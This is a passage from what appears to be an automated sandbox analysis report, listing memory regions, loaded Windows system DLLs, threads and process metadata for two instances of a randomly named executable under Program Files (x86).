"pagefile_0x0000000000010000" filename = "" Region: id = 5359 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 5360 start_va = 0x4a0000 end_va = 0x55dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5361 start_va = 0x620000 end_va = 0x71ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 5362 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 5363 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 5364 start_va = 0x440000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 5365 start_va = 0x490000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 5366 start_va = 0x720000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 5367 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 5368 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5369 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 5370 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 5371 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 5372 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5373 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5374 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5375 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5376 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5377 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5378 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 5379 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 5380 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 5628 start_va = 0x560000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 5629 start_va = 0x820000 end_va = 0x91ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 5630 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 5631 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 5632 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 5633 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 5634 start_va = 0x6c540000 end_va = 0x6c5d1fff monitored = 0 entry_point = 0x6c54dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 5635 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5636 start_va = 0x920000 end_va = 0xaa7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000920000" filename = "" Region: id = 5637 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 139 os_tid = 0x858 Thread: id = 155 os_tid = 0xf94 Thread: id = 190 os_tid = 0x1068 Process: id = "47" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xce7c000" os_pid = "0x9f8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4485 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4486 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4487 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4488 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 4489 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 4490 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4491 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4492 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4493 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4494 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 4495 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4496 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4497 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4498 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4499 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4500 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 4848 start_va = 0x440000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 4849 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4850 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4851 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4852 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4853 start_va = 0x5a0000 end_va = 0x71ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 4854 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4855 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5388 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5389 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 5390 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5391 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 5392 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 5393 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 5394 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 5395 start_va = 0x720000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 5396 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 5397 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5398 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 5399 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 5400 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 5401 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5402 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5403 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5404 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5405 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5406 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5407 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 5408 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 5409 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 5410 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 5411 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 5638 start_va = 0x540000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 5639 start_va = 0x820000 end_va = 0x91ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 5640 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 5641 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 5642 start_va = 0x6c540000 end_va = 0x6c5d1fff monitored = 0 entry_point = 0x6c54dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 5643 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5644 start_va = 0x920000 end_va = 0xaa7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000920000" filename = "" Region: id = 5645 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 140 os_tid = 0x6e4 Thread: id = 154 os_tid = 0xf8c Thread: id = 191 os_tid = 0x10c8 Process: id = "48" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xce81000" os_pid = "0xf44" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4508 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4509 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4510 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4511 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 4512 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 4513 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4514 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4515 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4516 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4517 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 4518 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4519 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4520 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4521 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4522 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4523 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 4856 start_va = 0x440000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 4857 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4858 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4859 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4860 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4861 start_va = 0x5e0000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 4862 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4863 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4864 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4865 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4866 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4867 start_va = 0x5d0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 4868 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 5412 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 5413 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 5414 start_va = 0x5e0000 end_va = 0x6dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 5415 start_va = 0x710000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 5416 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 5417 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5418 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 5419 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 5420 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 5421 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5422 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = 